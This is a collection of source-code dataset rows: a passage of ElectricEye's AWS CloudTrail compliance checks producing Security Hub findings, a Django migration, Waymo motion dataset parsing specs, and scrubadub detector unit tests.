                    "Workflow": {"Status": "RESOLVED"},
                    "RecordState": "ARCHIVED",
                }
            else:
                # No CloudWatch Logs integration: FAILED (MEDIUM severity) finding.
                finding = {
                    "SchemaVersion": "2018-10-08",
                    "Id": trailArn + "/cloudtrail-cloudwatch-logging-check",
                    "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                    "GeneratorId": trailArn,
                    "AwsAccountId": awsAccountId,
                    "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
                    "FirstObservedAt": iso8601Time,
                    "CreatedAt": iso8601Time,
                    "UpdatedAt": iso8601Time,
                    "Severity": {"Label": "MEDIUM"},
                    "Confidence": 99,
                    "Title": "[CloudTrail.2] CloudTrail trails should have CloudWatch logging configured",
                    "Description": "CloudTrail trail "
                    + trailName
                    + " does not have CloudWatch Logging configured. Refer to the remediation instructions if this configuration is not intended",
                    "Remediation": {
                        "Recommendation": {
                            "Text": "If your trail should send logs to CloudWatch refer to the Monitoring CloudTrail Log Files with Amazon CloudWatch Logs section of the AWS CloudTrail User Guide",
                            "Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/monitor-cloudtrail-log-files-with-cloudwatch-logs.html",
                        }
                    },
                    "ProductFields": {"Product Name": "ElectricEye"},
                    "Resources": [
                        {
                            "Type": "AwsCloudTrailTrail",
                            "Id": trailArn,
                            "Partition": awsPartition,
                            "Region": awsRegion,
                        }
                    ],
                    "Compliance": {
                        "Status": "FAILED",
                        "RelatedRequirements": [
                            "NIST CSF DE.AE-3",
                            "NIST SP 800-53 AU-6",
                            "NIST SP 800-53 CA-7",
                            "NIST SP 800-53 IR-4",
                            "NIST SP 800-53 IR-5",
                            "NIST SP 800-53 IR-8",
                            "NIST SP 800-53 SI-4",
                            "AICPA TSC CC7.2",
                            "ISO 27001:2013 A.12.4.1",
                            "ISO 27001:2013 A.16.1.7",
                        ],
                    },
                    "Workflow": {"Status": "NEW"},
                    "RecordState": "ACTIVE",
                }
            yield finding
@registry.register_check("cloudtrail")
def cloudtrail_encryption_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[CloudTrail.3] CloudTrail trails should be encrypted by KMS"""
    # Memoized list_trails() response shared by every check in this module.
    trail = list_trails(cache=cache)
    myCloudTrails = trail["Trails"]
    for trails in myCloudTrails:
        trailArn = str(trails["TrailARN"])
        trailName = str(trails["Name"])
        # Shadow trails excluded so each trail is evaluated exactly once.
        response = cloudtrail.describe_trails(trailNameList=[trailArn], includeShadowTrails=False)
        iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
        for details in response["trailList"]:
            # "KmsKeyId" is only present when the trail uses SSE-KMS, so key
            # presence is the pass/fail signal. A membership test replaces the
            # previous fragile pattern of catching a broad Exception and
            # string-matching the KeyError message.
            if "KmsKeyId" in details:
                # Trail is KMS-encrypted: PASSED finding, resolved/archived.
                finding = {
                    "SchemaVersion": "2018-10-08",
                    "Id": trailArn + "/cloudtrail-kms-encryption-check",
                    "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                    "GeneratorId": trailArn,
                    "AwsAccountId": awsAccountId,
                    "Types": [
                        "Software and Configuration Checks/AWS Security Best Practices",
                        "Effects/Data Exposure",
                    ],
                    "FirstObservedAt": iso8601Time,
                    "CreatedAt": iso8601Time,
                    "UpdatedAt": iso8601Time,
                    "Severity": {"Label": "INFORMATIONAL"},
                    "Confidence": 99,
                    "Title": "[CloudTrail.3] CloudTrail trails should be encrypted by KMS",
                    "Description": "CloudTrail trail " + trailName + " is encrypted by KMS.",
                    "Remediation": {
                        "Recommendation": {
                            "Text": "If your trail should be encrypted with SSE-KMS refer to the Encrypting CloudTrail Log Files with AWS KMS–Managed Keys (SSE-KMS) section of the AWS CloudTrail User Guide",
                            "Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/encrypting-cloudtrail-log-files-with-aws-kms.html",
                        }
                    },
                    "ProductFields": {"Product Name": "ElectricEye"},
                    "Resources": [
                        {
                            "Type": "AwsCloudTrailTrail",
                            "Id": trailArn,
                            "Partition": awsPartition,
                            "Region": awsRegion,
                        }
                    ],
                    "Compliance": {
                        "Status": "PASSED",
                        "RelatedRequirements": [
                            "NIST CSF PR.DS-1",
                            "NIST SP 800-53 MP-8",
                            "NIST SP 800-53 SC-12",
                            "NIST SP 800-53 SC-28",
                            "AICPA TSC CC6.1",
                            "ISO 27001:2013 A.8.2.3",
                        ],
                    },
                    "Workflow": {"Status": "RESOLVED"},
                    "RecordState": "ARCHIVED",
                }
            else:
                # No SSE-KMS key on the trail: FAILED (HIGH severity) finding.
                finding = {
                    "SchemaVersion": "2018-10-08",
                    "Id": trailArn + "/cloudtrail-kms-encryption-check",
                    "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                    "GeneratorId": trailArn,
                    "AwsAccountId": awsAccountId,
                    "Types": [
                        "Software and Configuration Checks/AWS Security Best Practices",
                        "Effects/Data Exposure",
                    ],
                    "FirstObservedAt": iso8601Time,
                    "CreatedAt": iso8601Time,
                    "UpdatedAt": iso8601Time,
                    "Severity": {"Label": "HIGH"},
                    "Confidence": 99,
                    "Title": "[CloudTrail.3] CloudTrail trails should be encrypted by KMS",
                    "Description": "CloudTrail trail "
                    + trailName
                    + " is not encrypted by KMS. Refer to the remediation instructions if this configuration is not intended",
                    "Remediation": {
                        "Recommendation": {
                            "Text": "If your trail should be encrypted with SSE-KMS refer to the Encrypting CloudTrail Log Files with AWS KMS–Managed Keys (SSE-KMS) section of the AWS CloudTrail User Guide",
                            "Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/encrypting-cloudtrail-log-files-with-aws-kms.html",
                        }
                    },
                    "ProductFields": {"Product Name": "ElectricEye"},
                    "Resources": [
                        {
                            "Type": "AwsCloudTrailTrail",
                            "Id": trailArn,
                            "Partition": awsPartition,
                            "Region": awsRegion,
                        }
                    ],
                    "Compliance": {
                        "Status": "FAILED",
                        "RelatedRequirements": [
                            "NIST CSF PR.DS-1",
                            "NIST SP 800-53 MP-8",
                            "NIST SP 800-53 SC-12",
                            "NIST SP 800-53 SC-28",
                            "AICPA TSC CC6.1",
                            "ISO 27001:2013 A.8.2.3",
                        ],
                    },
                    "Workflow": {"Status": "NEW"},
                    "RecordState": "ACTIVE",
                }
            yield finding
@registry.register_check("cloudtrail")
def cloudtrail_global_services_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[CloudTrail.4] CloudTrail trails should log management events"""
    # Memoized list_trails() response shared by every check in this module.
    trail = list_trails(cache=cache)
    myCloudTrails = trail["Trails"]
    for trails in myCloudTrails:
        trailArn = str(trails["TrailARN"])
        trailName = str(trails["Name"])
        # Shadow trails excluded so each trail is evaluated exactly once.
        response = cloudtrail.describe_trails(trailNameList=[trailArn], includeShadowTrails=False)
        iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
        for details in response["trailList"]:
            # Uses IncludeGlobalServiceEvents (global-service API events such as
            # IAM/STS) as the proxy for management-event logging.
            globalServiceEventCheck = str(details["IncludeGlobalServiceEvents"])
            if globalServiceEventCheck == "False":
                # Global service events disabled: FAILED (LOW severity) finding.
                finding = {
                    "SchemaVersion": "2018-10-08",
                    "Id": trailArn + "/cloudtrail-global-services-logging-check",
                    "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                    "GeneratorId": trailArn,
                    "AwsAccountId": awsAccountId,
                    "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
                    "FirstObservedAt": iso8601Time,
                    "CreatedAt": iso8601Time,
                    "UpdatedAt": iso8601Time,
                    "Severity": {"Label": "LOW"},
                    "Confidence": 99,
                    "Title": "[CloudTrail.4] CloudTrail trails should log management events",
                    "Description": "CloudTrail trail "
                    + trailName
                    + " does not log management events. Refer to the remediation instructions if this configuration is not intended",
                    "Remediation": {
                        "Recommendation": {
                            "Text": "If your trail should log management events refer to the Management Events section of the AWS CloudTrail User Guide",
                            "Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/logging-management-events-with-cloudtrail.html#logging-management-events",
                        }
                    },
                    "ProductFields": {"Product Name": "ElectricEye"},
                    "Resources": [
                        {
                            "Type": "AwsCloudTrailTrail",
                            "Id": trailArn,
                            "Partition": awsPartition,
                            "Region": awsRegion,
                        }
                    ],
                    "Compliance": {
                        "Status": "FAILED",
                        "RelatedRequirements": [
                            "NIST CSF DE.AE-3",
                            "NIST SP 800-53 AU-6",
                            "NIST SP 800-53 CA-7",
                            "NIST SP 800-53 IR-4",
                            "NIST SP 800-53 IR-5",
                            "NIST SP 800-53 IR-8",
                            "NIST SP 800-53 SI-4",
                            "AICPA TSC CC7.2",
                            "ISO 27001:2013 A.12.4.1",
                            "ISO 27001:2013 A.16.1.7",
                        ],
                    },
                    "Workflow": {"Status": "NEW"},
                    "RecordState": "ACTIVE",
                }
                yield finding
            else:
                # Global service events enabled: PASSED finding, resolved/archived.
                finding = {
                    "SchemaVersion": "2018-10-08",
                    "Id": trailArn + "/cloudtrail-global-services-logging-check",
                    "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                    "GeneratorId": trailArn,
                    "AwsAccountId": awsAccountId,
                    "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
                    "FirstObservedAt": iso8601Time,
                    "CreatedAt": iso8601Time,
                    "UpdatedAt": iso8601Time,
                    "Severity": {"Label": "INFORMATIONAL"},
                    "Confidence": 99,
                    "Title": "[CloudTrail.4] CloudTrail trails should log management events",
                    "Description": "CloudTrail trail " + trailName + " logs management events.",
                    "Remediation": {
                        "Recommendation": {
                            "Text": "If your trail should log management events refer to the Management Events section of the AWS CloudTrail User Guide",
                            "Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/logging-management-events-with-cloudtrail.html#logging-management-events",
                        }
                    },
                    "ProductFields": {"Product Name": "ElectricEye"},
                    "Resources": [
                        {
                            "Type": "AwsCloudTrailTrail",
                            "Id": trailArn,
                            "Partition": awsPartition,
                            "Region": awsRegion,
                        }
                    ],
                    "Compliance": {
                        "Status": "PASSED",
                        "RelatedRequirements": [
                            "NIST CSF DE.AE-3",
                            "NIST SP 800-53 AU-6",
                            "NIST SP 800-53 CA-7",
                            "NIST SP 800-53 IR-4",
                            "NIST SP 800-53 IR-5",
                            "NIST SP 800-53 IR-8",
                            "NIST SP 800-53 SI-4",
                            "AICPA TSC CC7.2",
                            "ISO 27001:2013 A.12.4.1",
                            "ISO 27001:2013 A.16.1.7",
                        ],
                    },
                    "Workflow": {"Status": "RESOLVED"},
                    "RecordState": "ARCHIVED",
                }
                yield finding
@registry.register_check("cloudtrail")
def cloudtrail_log_file_validation_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[CloudTrail.5] CloudTrail log file validation should be enabled"""
    # Memoized list_trails() response shared by every check in this module.
    trail = list_trails(cache=cache)
    myCloudTrails = trail["Trails"]
    for trails in myCloudTrails:
        trailArn = str(trails["TrailARN"])
        trailName = str(trails["Name"])
        # Shadow trails excluded so each trail is evaluated exactly once.
        response = cloudtrail.describe_trails(trailNameList=[trailArn], includeShadowTrails=False)
        iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
        for details in response["trailList"]:
            fileValidationCheck = str(details["LogFileValidationEnabled"])
            if fileValidationCheck == "False":
                # Log file validation disabled: FAILED (LOW severity) finding.
                # Description fixed: it previously said "does not log management
                # events", copy-pasted from the CloudTrail.4 check.
                finding = {
                    "SchemaVersion": "2018-10-08",
                    "Id": trailArn + "/cloudtrail-log-file-validation-check",
                    "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                    "GeneratorId": trailArn,
                    "AwsAccountId": awsAccountId,
                    "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
                    "FirstObservedAt": iso8601Time,
                    "CreatedAt": iso8601Time,
                    "UpdatedAt": iso8601Time,
                    "Severity": {"Label": "LOW"},
                    "Confidence": 99,
                    "Title": "[CloudTrail.5] CloudTrail log file validation should be enabled",
                    "Description": "CloudTrail trail "
                    + trailName
                    + " does not have log file validation enabled. Refer to the remediation instructions if this configuration is not intended",
                    "Remediation": {
                        "Recommendation": {
                            "Text": "If your trail should have log file validation enabled refer to the Validating CloudTrail Log File Integrity section of the AWS CloudTrail User Guide",
                            "Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html",
                        }
                    },
                    "ProductFields": {"Product Name": "ElectricEye"},
                    "Resources": [
                        {
                            "Type": "AwsCloudTrailTrail",
                            "Id": trailArn,
                            "Partition": awsPartition,
                            "Region": awsRegion,
                        }
                    ],
                    "Compliance": {
                        "Status": "FAILED",
                        "RelatedRequirements": [
                            "NIST CSF PR.DS-6",
                            "NIST SP 800-53 SC-16",
                            "NIST SP 800-53 SI-7",
                            "AICPA TSC CC7.1",
                            "ISO 27001:2013 A.12.2.1",
                            "ISO 27001:2013 A.12.5.1",
                            "ISO 27001:2013 A.14.1.2",
                            "ISO 27001:2013 A.14.1.3",
                            "ISO 27001:2013 A.14.2.4",
                        ],
                    },
                    "Workflow": {"Status": "NEW"},
                    "RecordState": "ACTIVE",
                }
                yield finding
            else:
                # Log file validation enabled: PASSED finding, resolved/archived.
                # Description fixed: the passing branch previously reused the
                # failing "does not log management events" text.
                finding = {
                    "SchemaVersion": "2018-10-08",
                    "Id": trailArn + "/cloudtrail-log-file-validation-check",
                    "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                    "GeneratorId": trailArn,
                    "AwsAccountId": awsAccountId,
                    "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
                    "FirstObservedAt": iso8601Time,
                    "CreatedAt": iso8601Time,
                    "UpdatedAt": iso8601Time,
                    "Severity": {"Label": "INFORMATIONAL"},
                    "Confidence": 99,
                    "Title": "[CloudTrail.5] CloudTrail log file validation should be enabled",
                    "Description": "CloudTrail trail "
                    + trailName
                    + " has log file validation enabled.",
                    "Remediation": {
                        "Recommendation": {
                            "Text": "If your trail should have log file validation enabled refer to the Validating CloudTrail Log File Integrity section of the AWS CloudTrail User Guide",
                            "Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html",
                        }
                    },
                    "ProductFields": {"Product Name": "ElectricEye"},
                    "Resources": [
                        {
                            "Type": "AwsCloudTrailTrail",
                            "Id": trailArn,
                            "Partition": awsPartition,
                            "Region": awsRegion,
                        }
                    ],
                    "Compliance": {
                        "Status": "PASSED",
                        "RelatedRequirements": [
                            "NIST CSF PR.DS-6",
                            "NIST SP 800-53 SC-16",
                            "NIST SP 800-53 SI-7",
                            "AICPA TSC CC7.1",
                            "ISO 27001:2013 A.12.2.1",
                            "ISO 27001:2013 A.12.5.1",
                            "ISO 27001:2013 A.14.1.2",
                            "ISO 27001:2013 A.14.1.3",
                            "ISO 27001:2013 A.14.2.4",
                        ],
                    },
                    "Workflow": {"Status": "RESOLVED"},
                    "RecordState": "ARCHIVED",
                }
                yield finding
9efb260f4986302b07bc61037b1cfedb118be7dc | 1,428 | py | Python | PhotoHub/Hub/migrations/0004_alter_customer_email_alter_customer_phone_and_more.py | akrhythm20/clickPhoto | 461735d750f4339e2f75d389dec98f0e7dc636c6 | [
"MIT"
] | null | null | null | PhotoHub/Hub/migrations/0004_alter_customer_email_alter_customer_phone_and_more.py | akrhythm20/clickPhoto | 461735d750f4339e2f75d389dec98f0e7dc636c6 | [
"MIT"
] | null | null | null | PhotoHub/Hub/migrations/0004_alter_customer_email_alter_customer_phone_and_more.py | akrhythm20/clickPhoto | 461735d750f4339e2f75d389dec98f0e7dc636c6 | [
"MIT"
] | 2 | 2022-01-26T15:15:16.000Z | 2022-01-28T13:17:06.000Z | # Generated by Django 4.0.1 on 2022-01-28 20:45
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make contact/location fields optional on the customer and photographer models."""

    dependencies = [
        ('Hub', '0003_delete_omniuser'),
    ]

    # Each tuple is (model_name, field_name, replacement field definition);
    # the comprehension expands them into the AlterField operations Django runs.
    operations = [
        migrations.AlterField(
            model_name=model_name,
            name=field_name,
            field=field_definition,
        )
        for model_name, field_name, field_definition in (
            ('customer', 'email', models.EmailField(blank=True, max_length=254, null=True)),
            ('customer', 'phone', models.IntegerField(blank=True, null=True)),
            ('customer', 'pincode', models.IntegerField(blank=True, null=True)),
            ('photographer', 'dob', models.DateTimeField(blank=True, null=True)),
            ('photographer', 'email', models.EmailField(blank=True, max_length=254, null=True)),
            ('photographer', 'phone', models.IntegerField(blank=True, null=True)),
            ('photographer', 'pincode', models.IntegerField(blank=True, null=True)),
        )
    ]
| 29.142857 | 75 | 0.557423 | 132 | 1,428 | 5.94697 | 0.333333 | 0.178344 | 0.22293 | 0.258599 | 0.782166 | 0.782166 | 0.735032 | 0.735032 | 0.699363 | 0.625478 | 0 | 0.02588 | 0.323529 | 1,428 | 48 | 76 | 29.75 | 0.786749 | 0.031513 | 0 | 0.785714 | 1 | 0 | 0.095583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.02381 | 0 | 0.095238 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b48a4b3d6c2cc415edc555eadd09b1fbb2c058c3 | 6,720 | py | Python | interaction_prediction/DataPrep/raw_features.py | david9dragon9/AIR | cbcb7cb74f4280596ede9d998f75f20c272843bd | [
"Apache-2.0"
] | 16 | 2021-06-20T17:01:46.000Z | 2021-12-16T19:04:42.000Z | interaction_prediction/DataPrep/raw_features.py | david9dragon9/AIR | cbcb7cb74f4280596ede9d998f75f20c272843bd | [
"Apache-2.0"
] | 1 | 2022-03-03T08:49:40.000Z | 2022-03-04T03:24:09.000Z | interaction_prediction/DataPrep/raw_features.py | david9dragon9/AIR | cbcb7cb74f4280596ede9d998f75f20c272843bd | [
"Apache-2.0"
] | 4 | 2021-08-18T13:36:42.000Z | 2022-03-04T06:03:44.000Z | import math
import os
import uuid
import time
from matplotlib import cm
import matplotlib.animation as animation
import matplotlib.pyplot as plt
import numpy as np
from IPython.display import HTML
import itertools
import tensorflow as tf
from google.protobuf import text_format
from waymo_open_dataset.metrics.ops import py_metrics_ops
from waymo_open_dataset.metrics.python import config_util_py as config_util
from waymo_open_dataset.protos import motion_metrics_pb2
# Scenario-level metadata: the single unique identifier of the scenario.
scenario_features = {
    'scenario/id': tf.io.FixedLenFeature([1], tf.string, default_value=None),
}
# Roadgraph samples: 20000 polyline points, each with a direction vector,
# an id, a type, a validity flag and an xyz position.
_ROADGRAPH_SPECS = {
    'dir': ([20000, 3], tf.float32),
    'id': ([20000, 1], tf.int64),
    'type': ([20000, 1], tf.int64),
    'valid': ([20000, 1], tf.int64),
    'xyz': ([20000, 3], tf.float32),
}
roadgraph_features = {
    'roadgraph_samples/' + key: tf.io.FixedLenFeature(
        shape, dtype, default_value=None)
    for key, (shape, dtype) in _ROADGRAPH_SPECS.items()
}
# Per-agent state for up to 128 agents over three time windows: past
# (10 steps), current (1 step) and future (80 steps).  For every window the
# same twelve per-step quantities are recorded; timestamp_micros and valid
# are integral, all other quantities are floats.
_NUM_AGENTS = 128
_STEP_FIELDS = ('bbox_yaw', 'height', 'length', 'timestamp_micros', 'valid',
                'vel_yaw', 'velocity_x', 'velocity_y', 'width', 'x', 'y', 'z')
_INT_STEP_FIELDS = ('timestamp_micros', 'valid')


def _agent_window(window, num_steps):
    """Return the FixedLenFeature specs for one time window of agent state."""
    return {
        'state/%s/%s' % (window, field): tf.io.FixedLenFeature(
            [_NUM_AGENTS, num_steps],
            tf.int64 if field in _INT_STEP_FIELDS else tf.float32,
            default_value=None)
        for field in _STEP_FIELDS
    }


# Per-agent (time-independent) attributes first, then one block per window.
state_features = {
    'state/id':
        tf.io.FixedLenFeature([_NUM_AGENTS], tf.float32, default_value=None),
    'state/type':
        tf.io.FixedLenFeature([_NUM_AGENTS], tf.float32, default_value=None),
    'state/is_sdc':
        tf.io.FixedLenFeature([_NUM_AGENTS], tf.int64, default_value=None),
    'state/tracks_to_predict':
        tf.io.FixedLenFeature([_NUM_AGENTS], tf.int64, default_value=None),
}
state_features.update(_agent_window('current', 1))
state_features.update(_agent_window('future', 80))
state_features.update(_agent_window('past', 10))
state_features['state/objects_of_interest'] = tf.io.FixedLenFeature(
    [_NUM_AGENTS], tf.int64, default_value=None)
# Traffic-light state for 16 lanes, over the current step (1) and the past
# 10 steps.  Only the current window additionally carries the light id.


def _traffic_window(window, num_steps):
    """Return the FixedLenFeature specs for one window of traffic-light state."""
    specs = {}
    for field, dtype in (('state', tf.int64), ('valid', tf.int64),
                         ('x', tf.float32), ('y', tf.float32),
                         ('z', tf.float32)):
        specs['traffic_light_state/%s/%s' % (window, field)] = (
            tf.io.FixedLenFeature([num_steps, 16], dtype, default_value=None))
    return specs


traffic_light_features = dict(_traffic_window('current', 1))
traffic_light_features['traffic_light_state/current/id'] = (
    tf.io.FixedLenFeature([1, 16], tf.int64, default_value=None))
traffic_light_features.update(_traffic_window('past', 10))
# Combined tf.Example parsing spec: scenario metadata, roadgraph samples and
# per-agent state merged into a single description dict.
features_description = {
    **scenario_features,
    **roadgraph_features,
    **state_features,
}
features_description.update(traffic_light_features) | 43.636364 | 75 | 0.690476 | 898 | 6,720 | 5.017817 | 0.103563 | 0.051487 | 0.244563 | 0.200178 | 0.832889 | 0.799379 | 0.774967 | 0.768531 | 0.768531 | 0.758544 | 0 | 0.06499 | 0.159673 | 6,720 | 154 | 76 | 43.636364 | 0.732956 | 0.00744 | 0 | 0.388889 | 0 | 0 | 0.180114 | 0.111278 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.104167 | 0 | 0.104167 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
81ed3472035af98d2d4c818c80e5903160b470cc | 7,981 | py | Python | tests/test_detector_known.py | datascopeanalytics/scrubadub | ab199f0b3cc3ca11f646aabb05ebe124d2757ea5 | [
"Apache-2.0"
] | 190 | 2015-12-03T01:31:36.000Z | 2020-09-02T23:46:38.000Z | tests/test_detector_known.py | vishalbelsare/scrubadub | ab199f0b3cc3ca11f646aabb05ebe124d2757ea5 | [
"Apache-2.0"
] | 54 | 2020-09-10T14:46:14.000Z | 2022-03-10T06:03:00.000Z | tests/test_detector_known.py | datascopeanalytics/scrubadub | ab199f0b3cc3ca11f646aabb05ebe124d2757ea5 | [
"Apache-2.0"
] | 57 | 2016-04-04T18:37:38.000Z | 2020-08-18T22:59:03.000Z | import unittest
import scrubadub
class PredefinedTestCase(unittest.TestCase):
    """Tests for TaggedEvaluationFilthDetector and TaggedEvaluationFilth."""

    @staticmethod
    def _run(known_items, text):
        """Build a detector from *known_items* and return the filth found in *text*."""
        det = scrubadub.detectors.TaggedEvaluationFilthDetector(known_items)
        return list(det.iter_filth(text))

    def test_simple(self):
        """A plain substring match reports the correct span."""
        found = self._run([{'match': 'test', 'filth_type': 'test'}],
                          'this is a test string')
        self.assertEqual(found[0].beg, 10)
        self.assertEqual(found[0].end, 14)

    def test_ignore_case(self):
        """ignore_case toggles case-insensitive matching on and off."""
        text = 'this is a test string'
        found = self._run(
            [{'match': 'Test', 'filth_type': 'test', 'ignore_case': True}],
            text)
        self.assertEqual(found[0].beg, 10)
        self.assertEqual(found[0].end, 14)
        found = self._run(
            [{'match': 'Test', 'filth_type': 'test', 'ignore_case': False}],
            text)
        self.assertEqual(len(found), 0)

    def test_ignore_whitespace(self):
        """ignore_whitespace lets differing whitespace still match."""
        text = 'this\n is\t a test string'
        found = self._run(
            [{'match': 'this is a \n\n\ntest', 'filth_type': 'test',
              'ignore_whitespace': True}],
            text)
        self.assertEqual(len(found), 1)
        self.assertEqual(found[0].beg, 0)
        self.assertEqual(found[0].end, 17)
        found = self._run(
            [{'match': 'this is a \n\n\ntest', 'filth_type': 'test',
              'ignore_whitespace': False}],
            text)
        self.assertEqual(len(found), 0)

    def test_ignore_partial_match(self):
        """ignore_partial_word_matches controls matching inside larger words."""
        text = 'this is a test string'
        found = self._run(
            [{'match': 'is', 'filth_type': 'test',
              'ignore_partial_word_matches': True}],
            text)
        self.assertEqual(len(found), 1)
        self.assertEqual(found[0].beg, 5)
        self.assertEqual(found[0].end, 7)
        found = self._run(
            [{'match': 'is', 'filth_type': 'test',
              'ignore_partial_word_matches': False}],
            text)
        self.assertEqual(len(found), 2)
        self.assertEqual(found[0].beg, 2)
        self.assertEqual(found[0].end, 4)
        self.assertEqual(found[1].beg, 5)
        self.assertEqual(found[1].end, 7)

    def test_empty(self):
        """A detector with no known items finds nothing."""
        found = self._run([], 'this is a test string')
        self.assertEqual(len(found), 0)

    def test_wrong_types(self):
        """Entries with wrongly-typed values are rejected at construction."""
        bad_configs = [
            {'match': 1234, 'filth_type': 'test', 'ignore_case': True},
            {'match': '1234', 'filth_type': 1234, 'ignore_case': True},
            {'match': '1234', 'filth_type': '1234', 'match_end': 1234,
             'ignore_case': True},
        ]
        for config in bad_configs:
            with self.assertRaises(ValueError):
                scrubadub.detectors.TaggedEvaluationFilthDetector([config])

    def test_start_end(self):
        """A match/match_end pair spans from the start match to the end match."""
        found = self._run(
            [{'match': 'this is', 'match_end': 'test', 'filth_type': 'test'}],
            'hello this is a test string')
        self.assertEqual(found[0].beg, 6)
        self.assertEqual(found[0].end, 20)

    def test_word_boundaires(self):
        """Word-boundary handling keeps or drops partial-word matches."""
        text = 'hello this is a test string'
        found = self._run(
            [{'match': 'is', 'filth_type': 'test',
              'ignore_partial_word_matches': False}],
            text)
        self.assertEqual(found[0].beg, 8)
        self.assertEqual(found[0].end, 10)
        self.assertEqual(found[1].beg, 11)
        self.assertEqual(found[1].end, 13)
        self.assertEqual(len(found), 2)
        found = self._run(
            [{'match': 'is', 'filth_type': 'test',
              'ignore_partial_word_matches': True}],
            text)
        self.assertEqual(found[0].beg, 11)
        self.assertEqual(found[0].end, 13)
        self.assertEqual(len(found), 1)

    def test_text_case(self):
        """Case sensitivity is honoured against mixed-case match strings."""
        text = 'hello this is a test string'
        found = self._run(
            [{'match': 'This', 'filth_type': 'test', 'ignore_case': True}],
            text)
        self.assertEqual(found[0].beg, 6)
        self.assertEqual(found[0].end, 10)
        self.assertEqual(len(found), 1)
        found = self._run(
            [{'match': 'This', 'filth_type': 'test', 'ignore_case': False}],
            text)
        self.assertEqual(len(found), 0)

    def test_start_no_end(self):
        """A match whose match_end never occurs yields no filth."""
        found = self._run(
            [{'match': 'this is', 'match_end': 'impossible to find',
              'filth_type': 'test'}],
            'hello this is a test string')
        self.assertEqual(len(found), 0)

    def test_error(self):
        """Unknown keys in a predefined entry raise KeyError."""
        with self.assertRaises(KeyError):
            scrubadub.detectors.TaggedEvaluationFilthDetector([
                {'non_existiant': 'this is'},
            ])
        with self.assertRaises(KeyError):
            scrubadub.detectors.TaggedEvaluationFilthDetector([
                {'match': 'the match', 'filth_type': 'email',
                 'non_existiant': 'this is'},
            ])

    def test_filth_string(self):
        """str() of TaggedEvaluationFilth reflects its optional fields."""
        cases = [
            (dict(beg=0, end=5),
             "<TaggedEvaluationFilth text='' beg=0 end=5>"),
            (dict(beg=0, end=5, text='hello'),
             "<TaggedEvaluationFilth text='hello' beg=0 end=5>"),
            (dict(beg=0, end=5, text='hello', document_name='hello.txt'),
             "<TaggedEvaluationFilth text='hello' document_name='hello.txt' beg=0 end=5>"),
            (dict(beg=0, end=5, text='hello', comparison_type='greeting'),
             "<TaggedEvaluationFilth text='hello' beg=0 end=5 comparison_type='greeting'>"),
            (dict(beg=0, end=5, text='hello', document_name='hello.txt',
                  comparison_type='greeting'),
             "<TaggedEvaluationFilth text='hello' document_name='hello.txt' beg=0 end=5 comparison_type='greeting'>"),
        ]
        for kwargs, expected in cases:
            filth = scrubadub.filth.TaggedEvaluationFilth(**kwargs)
            self.assertEqual(str(filth), expected)
| 39.315271 | 115 | 0.62511 | 866 | 7,981 | 5.632794 | 0.10739 | 0.116851 | 0.183067 | 0.181222 | 0.903034 | 0.851579 | 0.828618 | 0.819598 | 0.743952 | 0.727347 | 0 | 0.018317 | 0.240697 | 7,981 | 202 | 116 | 39.509901 | 0.786634 | 0.044105 | 0 | 0.551724 | 0 | 0.006897 | 0.17696 | 0.042491 | 0 | 0 | 0 | 0 | 0.296552 | 1 | 0.082759 | false | 0 | 0.013793 | 0 | 0.103448 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
